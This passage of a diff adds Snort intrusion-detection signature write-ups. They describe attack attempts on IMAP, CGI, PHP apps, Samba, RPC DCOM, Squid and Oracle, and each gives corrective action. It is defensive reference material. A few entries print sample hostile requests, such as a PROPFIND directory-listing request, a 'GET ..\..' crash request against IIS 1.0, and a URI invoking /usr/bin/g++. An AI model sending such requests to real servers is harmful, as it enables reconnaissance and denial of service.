+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
--- /dev/null
+++ b/doc/signatures/3070.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3070
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"fetch" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2355.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2355
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application Invision Board.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+Invision Board contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating a variable when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file emailer.php.
+
+--
+Affected Systems:
+	Invision Power Services Invision Board 1.1.1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the variable that defines the location of the emailer.php
+script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3089.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3089
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a denial of
+service associated with Squid Web Cache Communication Protocol (WCCP).
+
+--
+Impact:
+A successful attack can cause the Squid web cache server process to
+terminate.
+
+--
+Detailed Information:
+A vulnerability exists in the way that a Squid server handles a WCCP
+message.  A WCCP I_SEE_YOU message that contains an invalid number of
+web cache entries can create an out-of-bounds array reference.  This may
+result in a read access violation of memory, causing a denial of service.
+
+--
+Affected Systems:
+	Squid Web Proxy Cache 2.5 STABLE7 and prior versions
+
+--
+Attack Scenarios:
+An attacker can craft a WCCP I_SEE_YOU message with an invalid number of
+web cache entries, causing the web cache server process to terminate.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/2328.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2328
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+authentication_index.php script which contains known vulnerabilities and
+is part of  the phpGedView CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the phpGedView CGI web application running on a server.
+Multiple vulnerabilities exist in the application which can lead to the
+execution of arbitrary code of the atttackers choosing.
+
+--
+Affected Systems:
+	phpGedView
+
+--
+Attack Scenarios:
+An attacker can supply code of their choice by including a file in
+paramters supplied to the script.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1706.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1706
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/582.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+582
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) rexd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port rexd is using.  Attackers can also learn what versions of the rexd protocol are accepted by rexd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as rexd run.  The rexd RPC service allows remote program execution.  If weak authentication is used, an attacker may run arbitrary commands as a user other than root.
+
+--
+Affected Systems:
+AIX 4.0
+Compaq Tru64 UNIX (Any version)
+HP-UX 10.20
+HP-UX 11
+Red Hat Linux 6.0
+Red Hat Linux 7.x
+Solaris 2.5.1
+Solaris 2.6
+Solaris 7
+Solaris 8
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where rexd runs.  This may be a precursor to accessing rexd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access rexd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for rexd, not probes of the rexd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the rexd service itself. An attacker may attempt to go directly to the rexd port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/37
+
+CERT
+http://www.cert.org/advisories/CA-1992-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS23
+
+
+--
--- /dev/null
+++ b/doc/signatures/1079.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+Sid:
+1079
+
+--
+
+Summary:
+This event is generated when an attempt is made to use the
+PROPFIND WebDAV request method on a web server.
+
+--
+Impact:
+Information gathering. An attacker can get a directory listing for all 
+directories configured to support WebDAV in an Apache web server. This
+could by a prelude to a more serious attack.
+
+--
+Detailed Information:
+WebDAV is a web publishing protocol implemented by several web servers,
+including Apache.  Certain configurations of Apache, such as those in
+SuSE 6.0-7.0 and RedHat 6.2-7.0, have WebDAV enabled and misconfigured
+in such a way to allow directory listings of the entire server file
+structure -- specificially, WebDAV was enabled on the Document Root of
+the web server.  Since subdirectories of a WebDAV-enabled directory
+are automatically enabled as well, this caused the entire web server
+to have WebDAV enabled.
+
+Since a directory, or its parent directory, must have been 
+specifically declared for WebDAV to be enabled, configuration errors
+should be straightforward to find and correct.
+
+--
+Affected Systems:
+	Apache Web Server with WebDAV enabled and misconfigured.
+ 
+--
+Attack Scenarios:
+Attacker gets a listing by sending something like:
+PROPFIND / HTTP/1.1
+
+--
+Ease of Attack:
+Simple. Requires that the attacker hand-craft an HTTP request.
+
+--
+False Positives:
+Legitimate web publishers may use PROPFIND commands, this should not be
+allowed from resources external to the protected network.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to determine whether this was likely an attack or not.
+Try to determine whether this was from a legitimate web publisher or not.
+Try to determine whether the target web server was Apache with WebDAV
+enabled and misconfigured.
+
+Disallow this method of publishing from resources external to the
+protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000537.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000537
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "thinkWMS" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "id" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "index.php" script used by the 
+"thinkWMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using thinkWMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/509.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+509
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2468.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2468
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1311.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1311
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "hardcore anal".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "hardcore anal".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/460.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+460
+
+--
+
+Summary:
+This event is generated when an ICMP Type 2 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 2 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 2 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 2 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2426.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2426
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2479.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2479
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/1347.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted g++ command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The g++
+command is the GNUproject's C and C++ compiler used to compile C and
+C++ source filesinto executable binary files. The attacker could
+possibly compile aprogram needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains
+'/usr/bin/g++'in theURI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested ona command line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/3228.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3228
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2417.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 
+2417
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1508.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1508
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1782.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1782
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "nipple clamp".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "nipple clamp".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2408.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2408
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/974.txt
@@ -0,0 +1,61 @@
+Comment - move to deleted rules - applies to IIS 1.0 and decode/inspect should now find this.
+Rule:
+
+
+--
+Sid:
+974
+
+--
+Summary:
+This event is generated when an attempt is made to peform a denial of service against Internet Information Service (IIS) 1.0 hosts. 
+
+--
+Impact:
+Denial of service.  This attack may cause an IIS 1.0 server to crash.
+
+--
+Detailed Information:
+IIS 1.0 servers are vulnerable to a denial of service attack when a malformed request containing "..\.." is sent to the server.  The service must be restarted to restore functionality.
+
+--
+Affected Systems:
+IIS 1.0 Servers
+
+--
+Attack Scenarios:
+An attacker can send a malformed request to a vulnerable IIS server to cause a denial of service. 
+
+--
+Ease of Attack:
+Simple.  Send a request similar to this:  GET ..\.. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0229
+
+Bugtraq:
+http://www.securityfocus.com/bid/2218
+
+--
--- /dev/null
+++ b/doc/signatures/826.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+826
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2890.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2890
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
